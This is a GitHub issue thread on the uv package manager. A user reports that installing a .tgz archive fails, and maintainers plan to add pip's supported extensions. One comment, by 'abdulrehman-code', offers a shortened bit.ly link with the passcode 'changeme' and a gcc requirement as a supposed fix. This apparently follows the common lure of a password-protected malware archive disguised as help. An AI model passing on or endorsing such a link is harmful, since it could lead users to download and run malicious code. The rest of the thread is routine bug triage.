### ISSUE TITLE
[compatibility] install tgz extension

### ISSUE THREAD

**Issue by mobidyc** [astral-sh/uv#7081]
Hi,

Installing a .tgz extension fails in error using uv

uv 0.4.4
python 3.10

```shell
# uv pip install acmeapi.tgz
error: Failed to parse: `acmeapi.tgz`
  Caused by: Expected path (`acmeapi.tgz`) to end in a supported file extension: `.whl`, `.zip`, `.tar.gz`, `.tar.bz2`, `.tar.xz`, or `.tar.zst`
acmeapi.tgz
^^^^^^^^^^
```

no issue using `pip`

**Comment by abdulrehman-code** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by charliermarsh** [comment]
Thanks, will fix.

**Comment by charliermarsh** [comment]
We should add all of these: https://github.com/pypa/pip/blob/111eed14b6e9fba7c78a5ec2b7594812d17b5d2b/src/pip/_internal/utils/filetypes.py#L9 (we already support them, I mean the extensions).

**Comment by mikeleppane** [comment]
Hey! Can I fix this?

**Comment by zanieb** [comment]
@mikeleppane go for it!

**Comment by charliermarsh** [comment]
@mikeleppane -- Just let us know if you're not able or don't plan to get to it (or need some pointers :)), so we can prioritize accordingly.
